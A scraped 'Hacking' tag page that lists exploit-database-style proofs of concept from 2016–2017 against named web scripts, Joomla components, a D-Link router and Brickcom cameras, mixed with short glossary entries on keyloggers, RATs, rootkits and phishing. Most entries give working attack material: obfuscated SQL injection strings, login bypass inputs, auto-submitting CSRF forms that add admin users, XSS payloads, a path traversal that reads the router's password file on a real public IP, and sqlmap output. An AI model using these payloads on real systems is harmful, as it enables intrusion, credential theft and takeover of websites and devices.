Showing results for the tag 'Hacking'.



699 results found

  1. Hacking

    # # # # #
    # Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection
    # Dork: N/A
    # Date: 25.08.2017
    # Vendor Homepage: https://extro.media/
    # Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/
    # Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en
    # Version: 1.6.1
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
    #
    # Etc..
    # # # # #
  2. Hacking

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # <!--
    # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: N/A
    # Date: 27.08.2017
    # Vendor Homepage: http://www.scubez.net/
    # Software Link: http://www.mscript.in/
    # Version: 2.7
    # Category: Webapps
    # Tested on: windows 7 / mozila firefox
    # supporting tools for testing : No-Redirect Add-on in firefox
    # --!>
    # ========================================================
    #
    # admin panel Authentication bypass
    #
    # Description : An Attackers are able to completely compromise the web application built upon
    # Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without
    # prior authentication!
    #
    # Proof of Concept : -
    # Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
    # Step 2: Access http://example.com/path/admin/index.php
    #
    # Risk : Unauthenticated attackers are able to gain full access to the administrator panel
    # and thus have total control over the web application, including content change,add admin user .. etc
    #
    # ========================================================
    # [+] Disclaimer
    #
    # Permission is hereby granted for the redistribution of this advisory,
    # provided that it is not altered except by reformatting it, and that due
    # credit is given. Permission is explicitly given for insertion in
    # vulnerability databases and similar, provided that due credit is given to
    # the author. The author is not responsible for any misuse of the information contained
    # herein and prohibits any malicious use of all security related information
    # or exploits by the author or elsewhere.
    #
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  3. Hacking

    # # # # #
    # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://codesgit.com/
    # Software Link: https://www.codester.com/items/997/smart-chat-php-script
    # Demo: http://demos.codesgit.com/smartchat/
    # Version: 1.0.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin.php
    # User: 'or 1=1 or ''=' Pass: anything
    #
    # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
    #
    # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
    #
    # Etc...
    # # # # #
  4. Hacking

    # # # # #
    # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
    # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/
    # Version: 1.2
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
    # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
    #
    # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
    #
    # Etc..
    # # # # #
  5. Hacking

    # # # # #
    # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
    # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The security obligation allows an attacker to arbitrary download files..
    #
    # Vulnerable Source:
    #
    # .............
    # <?php
    # $file = base64_decode($_GET['id']);
    #
    # if (file_exists($file)) {
    #     header('Content-Description: File Transfer');
    #     header('Content-Type: application/octet-stream');
    #     header('Content-Disposition: attachment; filename="'.basename($file).'"');
    #     header('Expires: 0');
    #     header('Cache-Control: must-revalidate');
    #     header('Pragma: public');
    #     header('Content-Length: ' . filesize($file));
    #     readfile($file);
    #     exit;
    # }
    # ?>
    # .............
    # Proof of Concept:
    #
    # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
    #
    # Etc...
    # # # # #
  6. Hacking

    # # # # #
    # Exploit Title: Easy Web Search 4.0 - SQL Injection
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
    # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/
    # Version: 4.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
    # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
    #
    # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
    #
    # Etc..
    # # # # #
  7. Hacking

    Binders take on the job of combining malicious keylogger and RAT files with other files so that they stay hidden from antivirus products and operate without trouble on the victim's system.
  8. Hacking

    RATs are broader than keyloggers: they can even send images of the monitor or connect the attacker directly to the victim's computer. An intruder may first gain some access to the victim's system with a keylogger and then install a RAT on that system.
  9. Hacking

    As the name suggests, a keylogger is a malicious program whose job is to record the keys pressed on the keyboard and send them to the intruder. You give almost all of your important information to your computer through the keyboard: usernames, passwords and addresses. To steal your information, the intruder plants a keylogger inside your system so that it can carry your data away.
  10. Hacking

    A network protocol for requesting and providing services. Intruders use Telnet to check whether critical ports are open.
  11. Hacking

    Although RootKits can in some respects be regarded like BackDoors or trojans, they are far more dangerous than trojans and backdoors. After penetrating a system, rootkits, on top of what trojans and Backdoors do, replace important parts of the operating system, even its kernel, and give intruders deadly and sometimes undetectable access. The first rootkits were identified in 1990, and since then a variety of rootkits have been written for Linux and Windows operating systems, although more RootKits have been written for Linux than for Windows. One well-known type of Linux RootKit replaces the /bin/login program and adds a root password to it. Most rootkits replace the following programs: DU Find Ifconfig Login ls Netstat ps. The most dangerous kind of RootKit, however, is the kind that replaces the operating system kernel, because it then controls the kernel itself and even affects the operation of virus and rootkit scanners, easily disabling and neutralizing them. With kernel-level rootkits the intruder can record and eavesdrop on all operations and activity completely and without trouble. Among the most important Linux kernel-level rootkits are Knrak and Adore, which can be downloaded from the internet.
  12. Hacking

    Phishing attacks can be counted among attacks in the field of social engineering. Using phishing, the intruder sets out to steal information from a huge number of users. One well-known phishing attack is sending fake emails purporting to come from a bank: an intruder emails a fake message from a bank to a large number of users and places a link in it that, instead of leading to the bank's real page, takes the user to a page that looks like the bank's page. After seeing a page resembling the bank's and entering their username and password, the user falls into the hacker's trap. In some phishing attacks the usernames and passwords of thousands of bank customers are stolen. Phishing also refers to stealing information through phone calls or text messages, meaning that intruders sometimes try to extract information from users by calling them.
  13. Hacking

    In past decades phreakers were the most active. Phreakers break into telephone networks and eavesdrop on conversations. These phreakers may carry out projects for secret and criminal organizations, so being a phreaker is a crime, and phreakers are prosecuted and punished in every legal system in the world. Some phreakers, however, work only for themselves and use their knowledge to make free calls.
  14. Hacking

    A whacker (واکر) is a black-hat intruder who breaks into other systems in order to steal information. For example, on commission, a whacker enters the civil registry system and hands a person's residential address over to criminals.
  15. Hacking

    # # # # #
    # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities
    # Dork: N/A
    # Date: 29.08.2017
    # Vendor Homepage : http://mvc.net.pl/
    # Software Link: https://github.com/andrzuk/FineCMS
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: sohaip-hackerDZ
    # Author Web: http://www.hacker-ar.com
    # Author Social: @sohaip_hackerDZ
    # # # # #

    Reflected XSS in get_image.php

    Technical Description:
    file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded.

    Proof of Concept(PoC)
    http://your_finecms/application/lib/ajax/get_image.php?folder=1
    POST: id=1"><script>alert(1)</script>&name=1

    Arbitrary File Modify

    Technical Description:
    The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell.
    file /appalication/core/controller/template.php line50-line53
    follow function save()
    file /appalication/core/model/template.php line26-line48
    if file exists, we can modify it whihout any limit.
    insterestingly, there are two more Vulnerability for same function in different files.
    file /appalication/core/model/style.php line26-line48
    file /appalication/core/model/script.php line26-line48

    Proof of Concept(PoC)
    http://your_finecms/index.php?route=template
    http://your_finecms/index.php?route=style
    http://your_finecms/index.php?route=script
    POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz

    Authenticated SQL injection

    all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database.

    Technical Description:
    file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded.
    file /stat/get_stat_data.php line30 the sql inject into sql_query and execute.

    Proof of Concept(PoC)
    http://your_finecms/index.php?route=excludes&action=add
    POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz
    and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep.

    Stored XSS in images.php

    FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting.

    Technical Description:
    when we upload the file
    file application/core/controller/images.php line87
    and follow the function add()
    file application/core/model/images.php line78
    if filetype startwith "image",the filetype will insert into database
    when we view the detail of the images
    file application/lib/generators/view.php line106, somethings will output into pages.

    Proof of Concept(PoC)
    view the http://your_finecms/index.php?route=images&action=add and upload picture
    modify the picture's filetype
    view the detail of picture
    Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages.
    http://your_finecms/index.php?route=images&action=edit&id=15
    view the detail of picture

    Stored XSS in visitors.php

    FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting.

    Technical Description:
    just like last vulnerability.

    Proof of Concept(PoC)
    visit any page with js script code. such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  20.

    # # # # #
    # Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
    # Dork: N/A
    # Date: 30.08.2017
    # Vendor Homepage: http://www.joomanager.com/
    # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
    # Demo: http://www.joomanager.com/demo/realestate
    # Version: 2.0.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The security obligation allows an attacker to arbitrary download files..
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
    #
    # Etc..
    # # # # #
  21.

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # <!--
    # Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: inurl:controller=pjAdmin
    # Date: 30.08.2017
    # Homepage: https://www.phpjabbers.com/invoice-manager/
    # Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
    # Version: 3.1
    # Category: Webapps /php
    # Tested on: mozila firefox
    #
    # -->
    # ========================================================
    #
    # Invoice Manager v3.1 Cross site request forgery (Add Admin)
    #
    # Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
    # tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
    # Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
    #
    # ======================CSRF POC (Adding New user with Administrator Privileges)==================================

    <html>
    <body>
    <form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
    <input name="user_create" id="user_create" value="1" type="hidden">
    <input name="role_id" id="role_id" value="1" type="hidden" >
    <input name="email" id="email" value="[email protected]" type="hidden">
    <input name="password" id="password" value="12341234" type="hidden">
    <input name="name" id="name" value="Ali BawazeEer" type="hidden">
    <input name="phone" id="phone" value="911911911" type="hidden">
    <input name="status" id="status" value="T" type="hidden">
    <script type="text/javascript">document.csrf_form.submit();</script>
    </body>
    </html>

    # =================================================EOF =======================================================
    #
    # Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
    # and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
    #
    # Remedy : developer should implement CSRF token for each request
    #
    # ========================================================
    # [+] Disclaimer
    #
    # Permission is hereby granted for the redistribution of this advisory,
    # provided that it is not altered except by reformatting it, and that due
    # credit is given. Permission is explicitly given for insertion in
    # vulnerability databases and similar, provided that due credit is given to
    # the author. The author is not responsible for any misuse of the information contained
    # herein and prohibits any malicious use of all security related information
    # or exploits by the author or elsewhere.
    #
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  22. Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
    # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
    # Date: 29-08-2017
    # Exploit Author: Jithin D Kurup
    # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
    # Vendor : www.dlink.com
    # Version: Hardware version: B1 Firmware version: 2.01
    # Tested on: All Platforms

    1) Description

    After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL. D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. Its More Dangerous when your Router has a public IP with remote login enabled.

    IN MY CASE, Tested Router IP : http://190.164.170.249
    Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ

    2) Proof of Concept

    Step 1: Go to Router Login Page : http://190.164.170.249:8080
    Step 2: Add the payload to URL.
    Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

    Bingooo You got admin Access on router. Now you can download/upload settiing, Change setting etc.

    ---------------Greetz----------------
    +++++++++++ www.0seccon.com ++++++++++++
    Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
  23. Hacking

    -----------------------------------------------------------------------------------
    |<!--
    # Exploit Title: User Login and Management PHP Script - multiple vulnerabilities
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: N/A
    # Date: 29.08.2017
    # software link : https://www.codester.com/items/469/user-login-and-management-php-script
    # demo : http://froiden.cloudapp.net/LoginDashboard/index.php
    # Version: 3.04
    # Category: Webapps
    # Tested on: windows64bit / mozila firefox
    #
    # |--!>
    |----------------------------------------------------------------------------------

    1) admin dashboard authentication bypass

    Description : An Attackers are able to completely compromise the web application built upon the user login and management php script as they can gain access to the admin panel and manage other users as an admin without authentication!

    Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php
    Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php

    Risk : Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the application and users , including add admin user .. etc

    |----------------------------------------------------------------------------------

    2) account takeover - cross side request forgery

    Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password

    > exploitation <

    <html>
    <body>
    <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST">
    <script type="text/javascript">document.csrf_form.submit();</script>
    </body>
    </html>

    |-----------------------------------------EOF-----------------------------------------
  24. Hacking

    1. Advisory Information
    ========================================
    Title: Brickcom IP-Camera Remote Credentials and Settings Disclosure
    Vendor Homepage: http://www.brickcom.com
    Tested on Camera types: WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af
    Remotely Exploitable: Yes
    Vulnerability: Username / Password / Settings Disclosure (Critical)
    Shodan Dork: title:"Brickcom"
    Date: 14/12/2016
    Authors: Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar)
             Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio-lizaso-9ab73359)
             Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston-emanuel-rivadero-858b9ba)

    2. CREDIT
    ========================================
    This vulnerability was identified during penetration test and Research by Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero.

    3. Description
    ========================================
    Brickom Cameras allow a low-privilege user to disclose every configuration in the NVRAM, including credentials in clear text, remotely by making a simple requests. This vulnerability, coupled with the fact that there are two default users with known passwords which are rarely modified, allows an attacker to disclose the admin password and latter every config.

    The most Critical API call is users.cgi?action=getUsers, which provides every user credential. Many other API calls to get information for the WIFI password or FTP credentials, even the whole configuration, are affected depending on the camera model.

    On the hardware side, the UART console of some models (example: WCB-040Af, with baudrate 38400) is exposed in the PCB and after soldering the corresponding pins and connecting, the resulting shell has root access. A simple NVSHOW command will list every config available in clear text, including credentials.

    4. Proof-of-Concept:
    ========================================
    Using the following GET request:

    curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v

    Request:
    ----------
    > GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1
    > Authorization: Basic <BASE64 user:pass>
    > User-Agent: curl/7.35.0
    > Host: <IP>:<PORT>
    > Accept: */*
    >

    Response:
    ----------
    < HTTP/1.1 200 Ok
    < Server: mini_httpd
    < Cache-Control: no-cache
    < Pragma: no-cache
    < Expires: 0
    < Content-Type: text/html
    < Connection: close
    <
    size=3
    User1.index=0
    User1.username=admin
    User1.password=admin
    User1.privilege=1
    User2.index=1
    User2.username=viewer
    User2.password=viewer
    User2.privilege=0
    User3.index=3
    User3.username=rviewer
    User3.password=rviewer
    User3.privilege=2

    5. SOLUTION
    ========================================
    The vendor has been contacted and the firmware was updated. See disclosure in: https://www.brickcom.com/news/productCERT_security_advisorie.php
  25.

    # Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
    # Date: 2016-09-16
    # Exploit Author: Larry W. Cashdollar, @_larry0
    # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/
    # Software Link:
    # Version: 1.0.6
    # Tested on: Linux
    # CVE : CVE-2016-1000124
    # Advisory: http://www.vapidlabs.com/advisory.php?v=170
    # Exploit:

    $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"

    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
    ---
    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
    ---
    [13:30:39] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [13:30:39] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 2715 times
    [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

    [*] shutting down at 13:30:39